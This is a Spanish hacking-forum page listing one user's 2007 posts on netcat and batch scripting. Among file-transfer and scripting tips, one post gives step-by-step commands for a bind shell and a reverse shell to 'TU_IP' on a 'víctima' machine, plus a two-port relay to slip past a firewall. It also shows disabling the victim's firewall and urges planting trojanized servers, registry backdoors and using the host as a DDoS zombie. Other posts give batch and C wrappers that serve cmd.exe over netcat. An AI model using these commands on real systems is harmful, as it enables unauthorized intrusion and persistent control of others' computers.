Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Zykl0n-B

#1
Hacking / Re: Jugando con netcat
15 Diciembre 2007, 22:09 PM
Netcat originalmente fue hecho para plataformas UNIX, si no encuentras un "Exe" de seguro te bajaste una versión para UNIX, Weld Pond, del grupo L0pht, lo programó para entornos NT (Windows XP está basado en New Technology, "NT" ).

Bájalo directamente de acá:

Download

Bajarás un ZIP con el código fuente, los Readme, y el binario ya compilado llamado "nc.exe".
Saludos.
#2
Hacking / Re: Jugando con netcat
10 Diciembre 2007, 00:16 AM
Con respecto a D4RIO, dije mil y una vez, que al Programarlo en C, utilizando "Printf", netcat no transfería los datos, quedaba "A ciegas", y lo hice con System para hacercelo a todos más fácil, ¿Qué esperas? no todos son programadores Aquí, de la forma que lo hice es "Entendible" hasta por el más Newbie.

Con respecto a Puaggg, No, Netcat te da Acceso remoto funcionando como Cliente/Servidor, las 2 únicas formas de que ganes Acceso a la empresa de tu colega es que:

1.- Él deje un Netcat Escuchando por conexiones, y así, tú no tendrías que meter nada, sólo utilizar a Netcat como Cliente, Conectarte y Entrar.

2.-Que tu colega deje un Servidor telnet Activado, así sólo usarias a Netcat como cliente, y entrarías por Telnet.

Pero no sólo con Netcat, puedes Utilizar Exploits para entrar a la empresa, el mismo Netcat trae una función para Obtener datos de los servidores a los que se conecta, y así puedes investigar vulnerabilidades conocidas, visita Este foro, ahí he estado escribiendo y detallando varias cosas, entre ellas todas las funciones posibles de Netcat...

vale, Saludos.
#3
Hacking / Re: Jugando con netcat
7 Diciembre 2007, 18:52 PM
CitarHola! por favor necesito que alguien me ayude con esto por favor, soy nuevo y me intereso este post sobre jugando con netcat... bueno el problema esta en que cuando intento transferir un archivo de una pc a otra ("Jugando con netcat parte V") se transfiere pero pesa 0 bytes! no se por que me pasa esto segui todos los pasos tal cual... y el archivo que al final se transfiere pesa 0 bytes! gracias de antemano...

No he leído el Post de "Jugando con Netcat parte V", pero supongo que puedo ayudarte,

Al transferir archivos debes especificar un nombre y extensión en el Cliente para el Archivo, si quieres transferir "Imagen.JPG" pues, en el cliente debes de especificarlo igual "Imagen.JPG", te dejo un Ejemplo:

Servidor:

C:\Mis videos>nc -v -L -p 999 <"Metallica - Motorbreath.avi"
listening on [any] 999 ...


Vale, el servidor ya te está dando información de que está a la escucha de algún cliente para transferirle el Archivo, ahora vamos con el cliente:


C:\Documents and settings\Zykl0n-B>nc 192.168.1.33 >"Metallica - Motorbreath.avi"
DNS fwd/rev mismatch: ZYKL0N-B != 192.168.1.33
ZYKL0N-B [192.168.1.33] 999 (?) open


Bien, como ves, ya la conexión está establecida, pero Netcat no te avisará "El archivo se está transfiriendo" ó "Se transfirió el archivo satifactoriamente"´, así que si es muy grande el archivo, espera un rato, y luego cierras la conexión.

Espero que te sirva.... Saludos.
#4
Hacking / Re: Jugando con netcat
7 Diciembre 2007, 18:07 PM
Saludos a tod@s,
D4RIO:
Citar
Hey, si querés seguridad te conviene pasar la parte de comprobar password a un ejecutable para que no se pueda ver el fuente...a parte podés dejar el proceso corriendo, hacerlo persistente, usar md5...lo que quieras...Lo podés hacer en C++, o bien en C.

Vale, tienes razón, para los que no sepan pasar un Script Batch a "C" para poder compilarlo y obtener un Exe, acá les dejo un Script para Netcat mucho más "trabajado" por así decirlo que el que posteé hace unos días, vale, primero el Script Batch:


:main
@Echo off
Echo.
Echo      ////  /// /////// /////// /////// /////// ///////
Echo     ///// /// ///       ///   ///  //     ///   ///
Echo    /// ///// /////     ///   ///     ///////   ///
Echo   ///  //// ///       ///   ///  // //  ///   ///
Echo  ///   /// ///////   ///   /////// ///////   ///
Echo.
Echo               Security Shell (2007)
Echo                                     By: Zykl0n-B (c)
Echo.
Echo Esta sesi¢n est  protegida bajo Login,
Echo S¢lo Usuarios registrados pueden Acceder.
Echo.
Echo Login:
Set/p user1=
If %user1%==default (goto gooduser) Else goto baduser
:gooduser
Echo El nombre de Usuario %user1% es Correcto.
Echo Password:
Set/p passwd1=
If %passwd1%==default (goto accessgranted) Else goto accessdenied
:baduser
Echo El nombre de Usuario %user1% es Incorrecto.
Echo.
Echo             -* ACCESO DENEGADO *-
Echo.
Pause>nul
Exit
:accessgranted
Echo Login Completo... Remote Shell = OK!
Echo.
Echo =====================================================
Echo ­Bienvenido %user1%!
Echo  Fecha: %date%
Echo =====================================================
@CMD.EXE
Echo.
Echo                   -* Conexi¢n Finalizada *-
Echo.
Pause>nul
Exit
:accessdenied
Echo.
Echo El Password Introducido es Incorrecto,
Echo Por favor, Intente de nuevo.
Pause>nul
Goto main


Tanto el login como el Passwd son "default", por supuesto, lo puedes cambiar a tu preferencia.

Acá está en formato "Batch" ó de Procesamiento por lotes, sólo lo copias al Block de Notas, lo guardas como "Archivo.bat" y listo, tienes un Servidor con Autentificación de Usuario y Contraseña para las Shells de Netcat, pero acá surge el problema de que con un simple "Click secundario y Editar" tanto el Código fuente como tu Usuario y Contraseña quedarán revelados "En texto plano", pues, ¿Cuál es la solución?, pasarlo a un Ejecutable (Exe), acá les dejo el mismo Servidor, pero en formato de "C", veamos:


#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main(void)
{
char login[10];
char pass[10];
int contar=0;
  system("Echo.");
  system("Echo      ////  /// /////// /////// /////// /////// ///////");
  system("Echo     ///// /// ///       ///   ///  //     ///   ///");
  system("Echo    /// ///// /////     ///   ///     ///////   ///");
  system("Echo   ///  //// ///       ///   ///  // //  ///   ///");
  system("Echo  ///   /// ///////   ///   /////// ///////   ///");
  system("Echo.");
  system("Echo               Security Shell (2007)");
  system("Echo                                     By: Zykl0n-B (c)");
  system("Echo Esta sesion esta protegida bajo Login,");
  system("Echo Solo Usuarios registrados pueden acceder");
  system("Echo.");
do
{
system("Echo Login:");
gets(login);
system("Echo Password:");
gets(pass);
contar++;
}while(strcmp(login,"root")!=0 && strcmp(pass,"toor")!=1 || contar==3);
if(strcmp(login,"root")==0 && strcmp(pass,"toor")==0)
{

system("Echo.");
system("Echo ===================================================================");
system("Echo ¡Bienvenido!");
system("Echo Fecha: %date%");
system("Echo ===================================================================");
system("Echo.");
system("cmd.exe");   
system("Echo.");   
system("Echo               -* Conexi¢n Finalizada *-");
system("Echo.");
  return 0;
}
else
{
system("Echo Password Incorrecto,");
system("Echo Por favor intente luego.");
system("Echo.");
system("pause>nul && exit");
}
return 0;
}



Vaaaale vale, lo he cambiado un poco, pero es prácticamente lo mismo, te logueas como "root" y con el password "toor" (Sí sí, no es coincidencia, justo como en Backtrack)

¿Por qué he usado tanto "system("");"?, pues, utilizando "printf("");", Netcat no transfería el diálogo al host remoto, por lo que te logueabas "a ciegas", y dado a la presentación tan bonita que tiene el Script, preferí correrlo con recursos del Sistema.

Ya tus passwords no andan por ahi en texto plano, estás más "Seguro", Ah por cierto, pueden hacer lo mismo con cualquier archivo bat que se les antoje :P

Acá les dejo un Screenshot del Script "andando":



Espero que les sirva, saludos.
#5
Hacking / Re: Jugando con netcat
5 Noviembre 2007, 11:49 AM
¡Venga! no había leído tus Posts de "Jugando con Netcat" detenidamente...
En el número 3 dices "Poner contraseñas" Pero sólo haces que verifique las IP's.. Esas no son contraseñas, aquí les dejo un Batch que pide Usuario y Password, y si no escriben el correcto, Pa' fuera van xD

Funciona parecido al del manual de WHK, 2 archivos, aquí les dejo el código:

Servidor.bat
Citar@echo off
Echo \\\\\\\\\\\\\\\\ZONA PROTEGIDA/////////////////
Echo Estas conectandote con el servidor de Zykl0n-B
Echo Por favor, Identificate.
Echo Nombre de Usuario:
set/p user1=
if %user1%==Zykl0n (goto gooduser) else goto baduser
:gooduser
Echo.
Echo El usuario %user1% es correcto,
Echo ahora introduce tu Password:
set/p pass1=
if %pass1%==mypassword (goto goodpass) else goto badpass
:baduser
Echo Tu nombre de usuario es Incorrecto
pause
exit
:goodpass
@Cls
Echo Bienvenido %user1%! && cmd.exe
Echo La Conexion ha terminado.
pause
exit
:badpass
Echo Password incorrecto
pause
exit

Ese vendrá siendo el Servidor, ahora el archivo que hace correr a Netcat y que hace correr el Server:

Run Server.bat

Citar@Echo off
start nc -d -e servidor.bat -L -p 33333

Venga, Gracias a WHK por haber publicado esos manuales, no habría pensado en "Netcat con Passwords" :p , venga, espero que les sirva.
Saludos
#6
Scripting / Re: abrir programa de forma oculta?
2 Noviembre 2007, 15:57 PM
Recuerda que en un batch, los comandos se ejecutan tal cual como en la consola, si en la consola es así "%programfiles%\ares\ares.exe -h" pues, en el batch tambien, y sólo tienes que hacerlo así:

@Echo off
@%programfiles%\ares\ares.exe -h
@exit


Pero la opción de oculto (-h) debe venir con el programa, hay algunos que no aceptan ese parámetro de ejecución, pero éste no es el caso de Ares, Saludos.
:D
#7
Scripting / Re: Batch + NetCat (ayuda)
2 Noviembre 2007, 15:39 PM
Eh... ¿Die console? esa función es nueva en el Netcat...
Yo conocía era a DETACH ó "Separado" de la consola.. Jaja..

Y sí, todo depende de lo que quieras hacer... si quieres chatear con tu víctima, sí te serviría esa linea de comandos:

"nc.exe -l -p 6000"

Con eso tú desde tu casa te conectas y le dices "Hola, soy yo".

Si quieres una Shell remota de la víctima, tienes varias (Bastantes) formas de hacerlo..

1.-en caso de que tu víctima no tenga el Firewall activado para que no te rebote la conexión..
"nc -d -e cmd.exe -l -p 6000"

2.- En caso de que tenga el Firewall Activado, pues,  hagamos que sea tu victima quién te hackee a tí xD, ésto es posible porque Netcat ejecuta programas con la opción "Execute" (-e) por conexiones entrantes ó salientes, da igual:

Primero deja en tu casa un Netcat a la escucha en el puerto al que tu víctima se vaya a conectar:

"nc -v -v -l -p 6000"

Ahora ejecuta ésto en la Pc victima:

"nc -d -e cmd.exe TU_IP_Ó_DNS 6000"

¡Voilá!, tienes una shell remota, pero si quieres algo más "Educativo", sáltate el Firewall de tu víctima de la siguiente manera:

Deja en tu casa 2 shells abiertas ejecutando a Netcat en modo escucha en los puertos 80 (http) y 25 (smtp):

C:\>nc -v -v -l -p 80
C:\>nv -v -v -l -p 25

Ahora ve a dónde tu víctima y ejecuta ésto:

"nc -d TU_IP_Ó_DNS 80 | cmd | nc -d TU_IP_Ó_DNS 25"

Listo, ahora ¿Qué pasó?
Pues, deberás escribir los comandos en la Shell que dejaste escuchando en el puerto 80.. ¿Pero no te responde nada? jaja, las respuestas a los comandos que escribas por esa shell saldrán en la shell que dejaste escuchando en el puerto 25..

¡Voilá! Otra shell remota

NOTA: Es obvio que tienes que desactivar tu firewall para que la víctima se conecte contigo.

Y una vez que tengas la shell de la víctima, ¿Por qué no desactivar el de él?

C:\Documents and settings\Victima>Netsh FIREWALL set opmode mode = DISABLE

Listo, Firewall desactivado :P

Para activarlo de nuevo sólo escribe lo mismo y suplanta DISABLE por ENABLE

Bájale por TFTP un servidor Ftp "Troyanizado", ejecutalo ocultamente (Serv-U permite hacer eso (-h)) y tendrás vista de todos sus archivos de manera "Gráfica" y no por consola.

Agrégale al Registro de Windows uno ó varios Backdoors, tienes infinidad de formas de hacerlo.

Aprovecha a tirar tus ataques por esa shell, utilízala como Zombie para ataques D.D.O.S., no sé, sólo ponte creativo..
#8
Hacking / Re: Jugando con netcat
31 Octubre 2007, 23:02 PM
¡Venga! ¿Una ventana negra sin parámetros?
La única forma de que a tu víctima le aparezca una ventana negra es que no estés indicándole a Netcat el modo "Detach" ó "Separado", revisa bien ese código..
Saludos.

;D
#9
Scripting / Re: Batch + NetCat (ayuda)
31 Octubre 2007, 17:22 PM
Hola a todos, no sé si llegue tarde a éste Post, pero igual.
Viejo, aquí te dejo los parámetros del comando NETSH para que juegues con el Firewall y toda la configuración de la Red.

Uso: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
             [Command | -f ScriptFile]

Los siguientes comandos est n disponibles:

Comandos en este contexto:
?              - Muestra una lista de comandos.
add            - Agrega una entrada de configuraci¢n a una lista de entradas.
bridge         - Cambia al contexto `netsh bridge'.
delete         - Elimina la entrada de una configuraci¢n de la lista de entradas.
diag           - Cambia al contexto `netsh diag'.
dump           - Muestra una secuencia de comandos de configuraci¢n.
exec           - Ejecuta un archivo de secuencia de comandos.
firewall       - Cambia al contexto `netsh firewall'.
help           - Muestra una lista de comandos.
interface      - Cambia al contexto `netsh interface'.
ras            - Cambia al contexto `netsh ras'.
routing        - Cambia al contexto `netsh routing'.
set            - Actualiza la configuraci¢n de la informaci¢n.
show           - Muestra informaci¢n.
winsock        - Cambia al contexto `netsh winsock'.

Espero que te sirva, saludos